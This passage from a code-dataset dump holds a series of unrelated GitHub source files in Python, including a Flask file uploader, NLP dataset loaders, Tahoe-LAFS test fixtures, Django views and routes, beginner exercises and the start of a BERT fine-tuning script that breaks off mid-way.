= fileOrigin[1].lower()\n if fileExt == \"jpeg\" or fileExt == \"jpg\" or fileExt == \"png\":\n encFile = hashlib.md5(\n get_secure_filename(f.filename).encode(\"utf-8\")\n ).hexdigest()\n pathFile = (\n UPLOAD_FOLDER + kelas + \"_\" + nama_user + \"_\" + encFile + \".\" + fileExt\n )\n f.save(pathFile)\n return 
{\n \"status\": \"ok\",\n \"path_file\": pathFile,\n \"photo_name\": kelas + \"_\" + nama_user + \"_\" + encFile + \".\" + fileExt,\n }\n elif fileExt == \"pdf\":\n encFile = hashlib.md5(\n get_secure_filename(f.filename).encode(\"utf-8\")\n ).hexdigest()\n pathFile = (\n UPLOAD_FOLDER + \"/doc/\" + nama_user + \"_\" + encFile + \".\" + fileExt\n )\n f.save(pathFile)\n return {\n \"status\": \"ok\",\n \"path_file\": pathFile,\n \"berkas_name\": nama_user + \"_\" + encFile + \".\" + fileExt,\n }\n else:\n return {\"status\": \"error\"}\n\n\ndef upload_resize_photo(f, nama_user, kelas):\n if f and allowed_extension(f.filename):\n fileOrign = f.filename.rsplit(\".\", 1)\n fileExt = fileOrign[1].lower()\n if fileExt == \"jpeg\" or fileExt == \"jpg\" or fileExt == \"png\":\n encryptFile = hashlib.md5(\n get_secure_filename(f.filename).encode(\"utf-8\")\n ).hexdigest()\n filename = f\"{kelas}_{nama_user}_{encryptFile}.{fileExt}\"\n path_file = UPLOAD_FOLDER + filename\n img = Image.open(f)\n # print(f\"IMAGE SIZE == {img.size}\")\n if img.size[0] <= 1000 & img.size[1] <= 1000:\n img.save(\n os.path.join(UPLOAD_FOLDER, filename), optimize=True, quality=95\n )\n\n response = dict(status=\"Ok\", filename=filename, path=path_file)\n return response\n else:\n width = int(img.size[0] / 10) * 2\n height = int(img.size[1] / 10) * 2\n\n re_image = img.resize((width, height), Image.ADAPTIVE)\n re_image.save(\n os.path.join(UPLOAD_FOLDER, filename), optimize=True, quality=95\n )\n response = dict(status=\"Ok\", filename=filename, path=path_file)\n return response\n","repo_name":"ariefendi992/sistem-monitoring","sub_path":"app/lib/uploader.py","file_name":"uploader.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"25922377092","text":"from typing import Dict, TypeVar\n\nimport torch\nfrom datasets import load_dataset\nfrom transformers import BertTokenizer\n\nfrom utils.data import DictTensorDataset\n\nfrom .base import DatasetForRE\n\nT = TypeVar(\"T\")\n\n\nclass SemEvalForRE(DatasetForRE):\n HUGGINGFACE_DATASET_NAME = \"sem_eval_2010_task_8\"\n BERT_TOKENIZER_NAME = \"bert-base-uncased\"\n MAX_SEQ_LEN = 128\n CLASSES_NUM = 19\n IGNORED_CLASS_INDEX = 0\n\n def __init__(self, hf_data):\n super(SemEvalForRE, self).__init__()\n self.tokenizer: BertTokenizer = BertTokenizer.from_pretrained(self.BERT_TOKENIZER_NAME, do_lower_case=True)\n self._data = self._transform_dataset(hf_data)\n\n @classmethod\n def get_dataset_name(cls):\n return cls.HUGGINGFACE_DATASET_NAME\n\n @property\n def inner_data(self):\n return self._data\n\n @classmethod\n def load(cls: T, dataset_name=None, **kwargs) -> Dict[str, T]:\n assert dataset_name is None or dataset_name == cls.HUGGINGFACE_DATASET_NAME\n ds_dict = load_dataset(cls.HUGGINGFACE_DATASET_NAME)\n return {\n \"train\": cls(ds_dict[\"train\"]),\n \"validate\": cls(ds_dict[\"test\"]),\n }\n\n def _transform_dataset(self, hf_data) -> DictTensorDataset:\n \"\"\"\n Example of each row of hf_data:\n {'sentence': 'The system as described above has its greatest application in an arrayed configuration of antenna elements.', 'relation': 3}\n \"\"\"\n input_ids = []\n attention_masks = []\n labels = []\n e1_pos = []\n e2_pos = []\n actual_lens = []\n for item in hf_data:\n encoded_dict = self.tokenizer(\n item[\"sentence\"],\n add_special_tokens=False,\n padding=\"max_length\",\n truncation=False,\n max_length=self.MAX_SEQ_LEN,\n return_attention_mask=True,\n 
return_tensors=\"pt\",\n )\n try:\n # find position of and \n ids = encoded_dict[\"input_ids\"]\n mask = encoded_dict[\"attention_mask\"]\n # Find e1(id:2487) and e2(id:2475) position\n pos1 = (ids == 2487).nonzero()[0][1].item()\n pos2 = (ids == 2475).nonzero()[0][1].item()\n if pos1 >= self.MAX_SEQ_LEN:\n pos1 = -1\n if pos2 >= self.MAX_SEQ_LEN:\n pos2 = -1\n # truncate manually\n if ids.shape[1] > self.MAX_SEQ_LEN:\n ids = torch.narrow_copy(ids, 1, 0, self.MAX_SEQ_LEN)\n ids[0, -1] = self.tokenizer.sep_token_id\n mask = torch.narrow_copy(mask, 1, 0, self.MAX_SEQ_LEN)\n e1_pos.append(pos1)\n e2_pos.append(pos2)\n # Add the encoded sentence to the list.\n input_ids.append(ids)\n # And its attention mask (simply differentiates padding from non-padding).\n attention_masks.append(mask)\n labels.append(item[\"relation\"])\n actual_len = torch.max(torch.arange(1, self.MAX_SEQ_LEN + 1, dtype=torch.long) * mask).item()\n actual_lens.append(actual_len)\n except:\n pass\n\n # Convert the lists into tensors.\n input_ids = torch.cat(input_ids, dim=0)\n attention_masks = torch.cat(attention_masks, dim=0)\n labels = torch.tensor(labels, dtype=torch.long)\n e1_pos = torch.tensor(e1_pos, dtype=torch.long)\n e2_pos = torch.tensor(e2_pos, dtype=torch.long)\n actual_lens = torch.tensor(actual_lens, dtype=torch.long)\n\n # Combine the training inputs into a TensorDataset.\n return DictTensorDataset(\n {\n \"input_ids\": input_ids,\n \"attention_masks\": attention_masks,\n \"labels\": labels,\n \"e1_pos\": e1_pos,\n \"e2_pos\": e2_pos,\n \"actual_lens\": actual_lens,\n }\n )\n","repo_name":"leonardodalinky/GNN_And_Tree","sub_path":"src/data/re/semeval.py","file_name":"semeval.py","file_ext":"py","file_size_in_byte":4069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3740464996","text":"import gc\nfrom base64 import b64encode\nfrom datetime import datetime\nfrom typing import Any, Callable, Generator, Optional\n\nimport attr\nfrom allmydata.storage.server import StorageServer\nfrom attrs import define, field\nfrom fixtures import Fixture, TempDir\nfrom testtools import TestCase\nfrom treq.client import HTTPClient\nfrom twisted.internet.defer import Deferred, inlineCallbacks\nfrom twisted.internet.interfaces import IReactorTime\nfrom twisted.internet.task import Clock, deferLater\nfrom twisted.python.filepath import FilePath\nfrom twisted.web.client import Agent, HTTPConnectionPool\n\nfrom .._plugin import open_store\nfrom ..config import CONFIG_DB_NAME, EmptyConfig, TahoeConfig\nfrom ..controller import DummyRedeemer, IRedeemer, PaymentController\nfrom ..model import VoucherStore, memory_connect\nfrom ..replicate import with_replication\n\n\n@attr.s(auto_attribs=True)\nclass AnonymousStorageServer(Fixture):\n \"\"\"\n Supply an instance of allmydata.storage.server.StorageServer which\n implements anonymous access to Tahoe-LAFS storage server functionality.\n\n :ivar tempdir: The path to the server's storage on the filesystem.\n\n :ivar storage_server: The protocol-agnostic storage server backend.\n\n :ivar clock: The ``IReactorTime`` provider to supply to ``StorageServer``\n for its time-checking needs.\n \"\"\"\n\n clock: Clock = attr.ib()\n\n tempdir: FilePath = attr.ib(default=None)\n storage_server: StorageServer = attr.ib(default=None)\n\n def _setUp(self) -> None:\n self.tempdir = FilePath(self.useFixture(TempDir()).join(\"storage\"))\n self.storage_server = StorageServer(\n self.tempdir.path,\n b\"x\" * 20,\n clock=self.clock,\n )\n\n\ndef 
_get_empty_config(rootpath: str, portnumfile: str) -> TahoeConfig:\n \"\"\"\n Construct an empty Tahoe configuration object.\n\n :param rootpath: The path of the node directory the configuration will\n use.\n \"\"\"\n return EmptyConfig(FilePath(rootpath))\n\n\n@define\nclass TemporaryVoucherStore(Fixture):\n \"\"\"\n Create a ``VoucherStore`` in a temporary directory associated with the\n given test case.\n\n :ivar get_config: A function like the one built by ``tahoe_configs``.\n :ivar get_now: A no-argument callable that returns a datetime giving a\n time to consider as \"now\".\n\n :ivar store: A newly created temporary store.\n \"\"\"\n\n get_now: Callable[[], datetime]\n get_config: Callable[[str, str], TahoeConfig] = _get_empty_config\n _public_key: str = b64encode(b\"A\" * 32).decode(\"utf-8\")\n redeemer: IRedeemer = field(init=False)\n store: Optional[VoucherStore] = None\n\n @redeemer.default\n def _redeemer_default(self) -> DummyRedeemer:\n return DummyRedeemer(self._public_key)\n\n def _setUp(self) -> None:\n self.tempdir = self.useFixture(TempDir())\n self.config = self.get_config(self.tempdir.join(\"node\"), \"tub.port\")\n db_path = FilePath(self.config.get_private_path(CONFIG_DB_NAME)).asTextMode()\n self.store = open_store(\n self.get_now,\n with_replication(memory_connect(db_path.path), False),\n self.config,\n )\n self.addCleanup(self._cleanUp)\n\n def _cleanUp(self) -> None:\n \"\"\"\n Drop the reference to the ``VoucherStore`` so the underlying SQLite3\n connection can close.\n \"\"\"\n self.store = None\n\n async def redeem(self, voucher: bytes, num_passes: int) -> None:\n \"\"\"\n Redeem a voucher for some passes.\n\n :return: A ``Deferred`` that fires with the redemption result.\n \"\"\"\n if self.store is None:\n raise ValueError(\"Must be set up before redeem()\")\n return await PaymentController(\n Clock(),\n self.store,\n self.redeemer,\n # Have to pass it here or to redeem, doesn't matter which.\n default_token_count=num_passes,\n # No value in splitting it into smaller groups in this case.\n # Doing so only complicates the test by imposing a different\n # minimum token count requirement (can't have fewer tokens\n # than groups).\n num_redemption_groups=1,\n allowed_public_keys={self._public_key},\n ).redeem(\n voucher,\n )\n\n\n@define\nclass Treq(Fixture):\n \"\"\"\n Offer a facility for creating an ``HTTPClient`` which does real I/O using\n a Twisted reactor and is automatically cleaned up.\n \"\"\"\n\n reactor: IReactorTime\n\n # We require a TestCase that supports asynchronous cleanups because\n # Fixtures can't handle them natively.\n case: TestCase\n\n pool: HTTPConnectionPool = field()\n\n @pool.default\n def _pool(self) -> HTTPConnectionPool:\n return HTTPConnectionPool(self.reactor)\n\n def _setUp(self) -> None:\n # Make sure connections from the connection pool are cleaned up at the\n # end of the test.\n self.case.addCleanup(self._cleanup)\n\n def client(self) -> HTTPClient:\n \"\"\"\n Get a new client object.\n \"\"\"\n return HTTPClient(Agent(self.reactor, self.pool))\n\n @inlineCallbacks\n def _cleanup(self) -> Generator[Deferred[Any], Any, None]:\n \"\"\"\n Clean up reactor event-sources allocated by ``HTTPConnectionPool``.\n \"\"\"\n # Close any connections that are idling in the connection pool.\n yield self.pool.closeCachedConnections()\n\n # There may be connections which were *just* finished with. Their\n # `loseConnection` has been called but the connection hasn't actually been\n # lost yet. 
If their buffers are actually empty then they will close\n # after the reactor gets another look at them. Unfortunately it is\n # unspecified how long after `loseConnection` the connection will actually\n # be lost (the protocol is told via its connectionLost method but the\n # connection pool does not expose that information to us). Empirically, a\n # couple of reactor iterations (or whatever the equivalent is on this\n # reactor) seems to be enough. If it's not, sorry.\n #\n # See https://github.com/twisted/twisted/issues/8998\n yield deferLater(self.reactor, 0, lambda: None)\n yield deferLater(self.reactor, 0, lambda: None)\n\n\nclass DetectLeakedDescriptors(Fixture):\n \"\"\"\n Check for file descriptors that are open at clean up time that were not\n open at set up time and cause the test to fail if any are found.\n \"\"\"\n\n blacklist_filenames = {\n \"privatestorageio-zkapauthz-v1.sqlite3\",\n \"privatestorageio-zkapauthz-v1.sqlite3 (deleted)\",\n }\n\n def _setUp(self) -> None:\n fdpath = FilePath(\"/proc/self/fd\")\n if fdpath.isdir():\n # If it exists, we can inspect it to learn about open file\n # descriptors. If it doesn't, it's a bit harder and we don't\n # bother for now.\n self._before = fdpath.children()\n self.addCleanup(self._cleanup)\n\n def _cleanup(self) -> None:\n def get_leaked() -> set[str]:\n after = FilePath(\"/proc/self/fd\").children()\n return {\n e.realpath()\n for e in set(after) - set(self._before)\n if e.realpath().basename() in self.blacklist_filenames\n }\n\n leaked = get_leaked()\n if leaked:\n # VoucherStore hangs off _Client which participates in a set of\n # impressively complex cyclic references. The reference counting\n # collector will not clean it up so we will *always* see open file\n # descriptors if we don't trigger the cycle collector.\n #\n # Garbage collection is expensive though and a lot of the test\n # suite doesn't make any VoucherStores or _Clients. 
So only\n # trigger this if we have reason to believe something might have\n # leaked.\n gc.collect()\n\n leaked = get_leaked()\n if leaked:\n raise ValueError(leaked)\n","repo_name":"PrivateStorageio/ZKAPAuthorizer","sub_path":"src/_zkapauthorizer/tests/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":8078,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"}
{"seq_id":"4203623749","text":"from django.shortcuts import render\nfrom .apps import WebsiteConfig\nfrom tensorflow.keras.preprocessing import sequence\nfrom twitter_extractor import twitter_main\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport os\n\n# Create your views here.\n\ndef login(request):\n return render(request, 'login.html', {})\n\ndef home(request):\n return render(request, 'home.html', {})\n\ndef dashboard(request):\n tweets = []\n bully_array = []\n tweets_df = twitter_main.run()\n # tweets_df = df.tail(20)\n for i in range(tweets_df.shape[0]):\n bully_array.append(prediction(tweets_df.loc[i].tweet))\n tweets.append((tweets_df.loc[i].username,tweets_df.loc[i].tweet,tweets_df.loc[i].date, bully_array[-1]))\n tweets_df['bully'] = bully_array\n pie = pie_val(tweets_df)\n\n return render(request, 'dashboard.html', {'tweets':tweets,'pie_bull':round(pie[0]*100/(pie[0]+pie[1]),2),'pie_nbull':round(pie[1]*100/(pie[0]+pie[1]),2)})\n\ndef prediction(sentence):\n test_sequences = WebsiteConfig.tokenizer.texts_to_sequences([sentence])\n test_sequences_matrix = sequence.pad_sequences(test_sequences, maxlen=1000)\n prediction = WebsiteConfig.model.predict(test_sequences_matrix, batch_size=None, verbose=0, steps=None)\n # response = {'Bully': str(prediction[0][0])}\n # print(response)\n # return str(prediction[0][0])\n if prediction[0][0]>0.5:\n return 'Bully'\n else:\n return 'Not Bully'\n\ndef pie_val(df):\n data = [len(df[df['bully'] == 'Bully']),len(df[df['bully'] == 'Not Bully'])]\n return data","repo_name":"TakshSoni123/Cyber-Bully-Detection-System","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"16585214992","text":"import pandas as pd\nimport pandas_market_calendars as mcal\nimport yfinance as yf\nfrom datetime import datetime\nimport sys\nimport pathlib\npath = str(pathlib.Path(__file__).parent.absolute())\n\n\nsys.path.insert(1, path+\"/../bonds\")\nimport funciones.download_functions as df\n\nsys.path.insert(1, path+\"/../database\")\nfrom db_connection import db\nimport load_info as li\nimport store_info as sidb\n\n\n\n\ndef get_historical_prices(movements):\n movs = movements.copy(deep=True)\n # Get the equity tickers, including cedears\n stocks = movs.loc[(movs.GRUPO == \"stock\") | (movs.GRUPO == \"cedear\")]\n tickers_stocks = list(set(stocks.ACTIVO.to_list()))\n\n bonos = movs.loc[(movs.GRUPO == \"bono\")]\n tickers_bonos = list(set(bonos.ACTIVO.to_list()))\n\n force_alt = True\n collection = db.test_collection\n data, fallas_t = li.load_function(tickers_stocks+[\"GGAL\", \"GGAL.BA\"], collection, li.load_price_info,\n li.load_connectionless_info_prices_propio, force_alt=force_alt, cant_t=10,\n ruedas_fallas=None)\n if not force_alt: li.append_last_value(data)\n tickers_stocks = [ticker for ticker in tickers_stocks if ticker not in fallas_t]\n\n bonds_p, fallas_b = df.get_hist_bonos(tickers=tickers_bonos + [\"GD30\", \"GD30D\"], use_iol=False)\n 
tickers_bonos = [ticker for ticker in tickers_bonos if ticker not in fallas_b]\n\n data.update(bonds_p)\n tickers = tickers_stocks + tickers_bonos\n fallas = fallas_t + fallas_b\n\n return data, tickers, fallas\n\n\n\n\n\n\ndef get_cedears_conversion():\n conversiones = pd.read_excel(\"cedears & adrs conversion.xlsx\", index_col=0)\n\n for ticker in conversiones.index:\n num, den = conversiones.loc[ticker, \"RATIO\"].split(\":\")\n conversiones.loc[ticker, \"RATIO\"] = int(num) / int(den)\n\n return conversiones\n\n\n\n\ndef get_market_dates(start_date, end_date):\n # Create a calendar\n nyse = mcal.get_calendar('NYSE')\n early = nyse.schedule(start_date=start_date, end_date=end_date)\n\n market_dates = list(mcal.date_range(early, frequency='1D'))\n market_dates = [x.replace(hour=0, minute=0, second=0, tzinfo=None) for x in market_dates]\n\n return market_dates\n\n\n\n\n\ndef group_stocks(movements):\n groups = {}\n for i in range(len(movements)):\n group, asset = movements.iloc[i][[\"GRUPO\", \"ACTIVO\"]]\n if group not in groups: groups[group] = []\n if asset not in groups[group]: groups[group].append(asset)\n\n return groups\n\n\n\n\n\ndef get_quantities_df(movements, tickers, dates):\n cantidades = pd.DataFrame(index=dates, columns=tickers)\n\n cantidades.loc[:, :] = 0\n\n # cantidades[\"CASH\"] = cantidades[\"CASH\"].ffill()\n for i in range(len(movements)):\n datos = movements.iloc[i]\n fecha, operacion, ticker, cantidad, precio, importe = datos[\n [\"FECHA\", \"OPERACION\", \"ACTIVO\", \"CANTIDAD\", \"PRECIO\", \"IMPORTE\"]]\n\n if operacion == \"compra\":\n cantidades.loc[cantidades.index >= fecha, ticker] += cantidad\n cantidades.loc[cantidades.index >= fecha, \"ARS\"] -= importe\n elif operacion == \"venta\":\n cantidades.loc[cantidades.index >= fecha, ticker] -= cantidad\n cantidades.loc[cantidades.index >= fecha, \"ARS\"] += importe\n elif operacion == \"fondeo\":\n cantidades.loc[cantidades.index >= fecha, \"ARS\"] += importe\n elif operacion == \"retiro\":\n cantidades.loc[cantidades.index >= fecha, \"ARS\"] -= importe\n\n return cantidades\n\n\n\n\ndef get_prices_df(prices, tickers, groups, dates, mep=None, ccl=None, conversions=None):\n if ccl is not None: ccl = ccl.copy(deep=True)\n if mep is not None: mep = mep.copy(deep=True)\n if conversions is not None: conversions = conversions.copy(deep=True)\n precios = pd.DataFrame(index=dates, columns=tickers)\n\n # Fill in the historical prices dataframe\n for ticker in tickers:\n tc = 1\n factor = 1\n if ticker in groups[\"cedear\"]:\n tc = ccl\n factor = conversions.loc[ticker, \"RATIO\"]\n precios[ticker] = prices[ticker][\"Close\"] * tc / factor\n precios.loc[:, \"ARS\"] = 1\n precios.loc[:, \"USD MEP\"] = mep\n\n return precios\n\n\n","repo_name":"jmarquez98/portfolio","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"7915651733","text":"# Write a program that replaces words in a sentence. The input begins with word replacement pairs (original and replacement). The next line of input is the sentence where any word on the original list is replaced.\n\n# Ex: If the input is:\n# automobile car manufacturer maker children kids\n# The automobile manufacturer recommends car seats for children if the automobile doesn't already have one.\n\n# the output is:\n# The car maker recommends car seats for kids if the car doesn't already have one. 
\n# You can assume the original words are unique.\n\n##\n\nuser_input = input()\nnew_list = user_input.split()\nmy_list = new_list\n\nother_input = input()\nnuevo_list = other_input.split()\nmio_list = nuevo_list\n\nfor x in my_list[::2]:\n mio_list = [n.replace(x,my_list[(my_list.index(x) + 1)]) for n in mio_list]\n\nstrbl = ''\nfor n in mio_list[:-1]:\n strbl += n + ' '\n\nstrbl += mio_list[-1]\n\nprint(strbl)","repo_name":"0xzt/Python","sub_path":"Chapter 10/replace_word.py","file_name":"replace_word.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16319394650","text":"# This program is a fantasy game inventory\r\n\r\ndef displayInventory(inventory):\r\n\tprint(\"Inventory:\")\r\n\titem_total = 0\r\n\tfor k, v in inventory.items():\r\n\t\tprint (str(v) + ' ' + k)\r\n\t\titem_total += v\r\n\tprint(\"Total number of items: \" + str(item_total))\r\n\r\ndef addToInventory(inventory, addedItems):\r\n\tfor i in addedItems:\r\n\t\tinventory.setdefault(i, 0)\r\n\t\tinventory[i] += 1\r\n\treturn inventory\r\n\r\nstuff = {'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12}\r\ndragonLoot = ['gold coin', 'dagger', 'gold coin', 'gold coin', 'ruby']\r\n\r\nstuff = addToInventory(stuff, dragonLoot)\r\ndisplayInventory(stuff)\r\n","repo_name":"matheus-beck/python-automate-boring-stuff","sub_path":"chapter 5/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72491779346","text":"#!/usr/bin/env python\n\"\"\"\nUsage: python get_position.py []\n\nThis program reads the position of all APT controllers found, or the one\nspecified\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport time\nimport pylibftdi\nimport pyAPT\n\ndef main(args):\n print('Looking for APT controllers')\n drv = pylibftdi.Driver()\n controllers = drv.list_devices()\n\n if len(args)>1:\n serial = args[1]\n else:\n serial = None\n\n if serial:\n controllers = [x for x in controllers if x[2] == serial]\n\n if controllers:\n for con in controllers:\n print('Found %s %s S/N: %s'%con)\n with pyAPT.MTS50(serial_number=con[2]) as con:\n print('\\tPosition (mm) = %.2f [enc:%d]'%(con.position(), con.position(raw=True)))\n\n return 0\n else:\n print('\\tNo APT controllers found. 
Maybe you need to specify a PID')\n    return 1\n\nif __name__ == '__main__':\n  import sys\n  sys.exit(main(sys.argv))\n\n","repo_name":"freespace/pyAPT","sub_path":"get_position.py","file_name":"get_position.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"48"}
{"seq_id":"12580942795","text":"#!/usr/bin/python3\n\"\"\"\nListing all states that contain the letter 'a' in it\n\"\"\"\n\nfrom model_state import Base, State\nfrom sys import argv\nfrom sqlalchemy import (create_engine, text)\nfrom sqlalchemy.orm import sessionmaker\n\nif __name__ == '__main__':\n engine = create_engine(\"mysql+mysqldb://{}:{}@localhost:3306/{}\"\n .format(argv[1], argv[2], argv[3])\n )\n # MODE 1\n sql_text = text(\n \"SELECT * FROM states WHERE name LIKE '%a%' ORDER BY id ASC\"\n )\n result = engine.execute(sql_text)\n table = result.fetchall()\n for state_id, state_name in table:\n print('{}: {}'.format(state_id, state_name))\n\n # MODE 2 - Creating states object\n # Session = sessionmaker(bind=engine)\n # session = Session()\n # objects = session.query(State).filter(State.name.like('%a%')).all()\n # for obj in objects:\n # print('{}: {}'.format(obj.id, obj.name))\n","repo_name":"Uss-Momas/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/9-model_state_filter_a.py","file_name":"9-model_state_filter_a.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"73075364305","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('login/', views.loginview, name='loginview'),\n path('cadastroCliente/', views.cadastroCliente, name='cadastroCliente'),\n path('cadastroConsumidor/', views.cadastroConsumidor, name='cadastroConsumidor'),\n path('home/', views.homeCliente, name='homeCliente'),\n path('homeConsumidor/', views.homeConsumidor, name='homeConsumidor'),\n path('pedido/', views.pedidoView, name='pedidoView'),\n path('relatorio/', views.relatorio, name='relatorio'),\n path('meuPerfil/', views.meuPerfil, name='meuPerfil'),\n path('editarCliente/', views.editarCliente, name='editarCliente'),\n path('editarConsumidor/', views.editarConsumidor, name='editarConsumidor'),\n path('logout/', views.logoutview, name='logoutview'),\n path('preparaCompra/', views.preparaCompra_verificalogado, name='PreparaCompra_verificalogado'),\n path('compraCredito/', views.compraCredito, name='compraCredito'),\n path('GeneratePDF/', views.GeneratePDF, name='GeneratePDF')\n]\n","repo_name":"GuilhermeYoshikawa/unipag","sub_path":"unipag/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"7433910396","text":"import sys\nfrom collections import defaultdict\nfrom collections import Counter\nfrom collections import deque\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def convertToTitle(self, n: int) -> str:\n res = \"\"\n while(n != 0):\n n -= 1\n temp = n % 26\n \n res += chr(temp + 65)\n\n n = n // 26\n\n\n return res[::-1]\n \n\n\n \n\n\nif __name__ == \"__main__\":\n solution = Solution()\n nums1 = 121\n\n m = [1,2,3,4]\n\n nums2 = [1,2,3] \n n = 3\n\n result = solution.convertToTitle(nums1)\n\n #print(solution.ls)\n\n print(nums1, 
result)","repo_name":"geniuscynic/leetcode","sub_path":"python/168. Excel表列名称.py","file_name":"168. Excel表列名称.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40875567916","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nfrom django.shortcuts import redirect\nfrom django.conf import settings\nfrom django.core.exceptions import MiddlewareNotUsed\n\nfrom nimbus.libs import bacula\nfrom nimbus.wizard import models\n\nclass Wizard(object):\n\n def __init__(self):\n wizard = models.Wizard.get_instance()\n if wizard.has_completed():\n bacula.unlock_bacula_and_start()\n raise MiddlewareNotUsed(\"wizard completed\")\n self.load_steps()\n\n def process_request(self, request):\n\n if not self.is_restricted_url(request):\n return None\n\n wizard = models.Wizard.get_instance()\n\n if wizard.has_completed():\n return None\n else:\n r = redirect('nimbus.wizard.views.wizard', step=\"start\")\n return r\n\n def load_steps(self):\n for app in settings.NIMBUS_WIZARD_APPS:\n __import__(app + '.views')\n\n def is_restricted_url(self, request):\n path = request.META['PATH_INFO']\n if path.startswith(\"/wizard\") or\\\n path.startswith(\"/media\") or\\\n path.startswith(\"/recovery\") or\\\n 'ajax' in path:\n return False\n return True\n","repo_name":"veezor/Nimbus","sub_path":"nimbus/wizard/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35067809644","text":"from __future__ import absolute_import, division, print_function\n\nimport argparse\nimport csv\nimport logging\nimport os\nimport random\nimport sys\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import (DataLoader, RandomSampler, SequentialSampler,\n TensorDataset)\nfrom torch.utils.data.distributed import DistributedSampler\nfrom tqdm import tqdm, trange\n\nfrom torch.nn import CrossEntropyLoss, MSELoss\nfrom scipy.stats import pearsonr, spearmanr\nfrom sklearn.metrics import matthews_corrcoef, f1_score\n\nfrom pytorch_pretrained_bert.file_utils import PYTORCH_PRETRAINED_BERT_CACHE\nfrom pytorch_pretrained_bert.modeling import BertForSequenceClassification, BertConfig, WEIGHTS_NAME, CONFIG_NAME\nfrom pytorch_pretrained_bert.tokenization import BertTokenizer\nfrom pytorch_pretrained_bert.optimization import BertAdam, warmup_linear\n\nfrom tensorboardX import SummaryWriter\n\nfrom callback import callback\nfrom twist import distort\n# TODO: change to proper imports\nfrom data_processors import *\nfrom util_funcs import *\n\n\nlogging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt = '%m/%d/%Y %H:%M:%S',\n level = logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n\n ## Required parameters\n parser.add_argument(\"--data_dir\",\n default=None,\n type=str,\n required=True,\n help=\"The input data dir. 
Should contain the .tsv files (or other data files) for the task.\")\n parser.add_argument(\"--bert_model\", default=None, type=str, required=True,\n help=\"Bert pre-trained model selected in the list: bert-base-uncased, \"\n \"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \"\n \"bert-base-multilingual-cased, bert-base-chinese.\")\n parser.add_argument(\"--task_name\",\n default=None,\n type=str,\n required=True,\n help=\"The name of the task to train.\")\n parser.add_argument(\"--output_dir\",\n default=None,\n type=str,\n required=True,\n help=\"The output directory where the model predictions and checkpoints will be written.\")\n\n ## Other parameters\n parser.add_argument(\"--max_seq_length\",\n default=128,\n type=int,\n help=\"The maximum total input sequence length after WordPiece tokenization. \\n\"\n \"Sequences longer than this will be truncated, and sequences shorter \\n\"\n \"than this will be padded.\")\n parser.add_argument(\"--do_train\",\n action='store_true',\n help=\"Whether to run training.\")\n parser.add_argument(\"--do_eval\",\n action='store_true',\n help=\"Whether to run eval on the dev set.\")\n parser.add_argument(\"--do_lower_case\",\n action='store_true',\n help=\"Set this flag if you are using an uncased model.\")\n parser.add_argument(\"--train_batch_size\",\n default=32,\n type=int,\n help=\"Total batch size for training.\")\n parser.add_argument(\"--eval_batch_size\",\n default=8,\n type=int,\n help=\"Total batch size for eval.\")\n parser.add_argument(\"--learning_rate\",\n default=5e-5,\n type=float,\n help=\"The initial learning rate for Adam.\")\n parser.add_argument(\"--num_train_epochs\",\n default=3.0,\n type=float,\n help=\"Total number of training epochs to perform.\")\n parser.add_argument(\"--warmup_proportion\",\n default=0.1,\n type=float,\n help=\"Proportion of training to perform linear learning rate warmup for. \"\n \"E.g., 0.1 = 10%% of training.\")\n parser.add_argument(\"--no_cuda\",\n action='store_true',\n help=\"Whether not to use CUDA when available\")\n parser.add_argument(\"--local_rank\",\n type=int,\n default=-1,\n help=\"local_rank for distributed training on gpus\")\n parser.add_argument('--gradient_accumulation_steps',\n type=int,\n default=1,\n help=\"Number of updates steps to accumulate before performing a backward/update pass.\")\n parser.add_argument('--loss_scale',\n type=float, default=0,\n help=\"Loss scaling to improve fp16 numeric stability. 
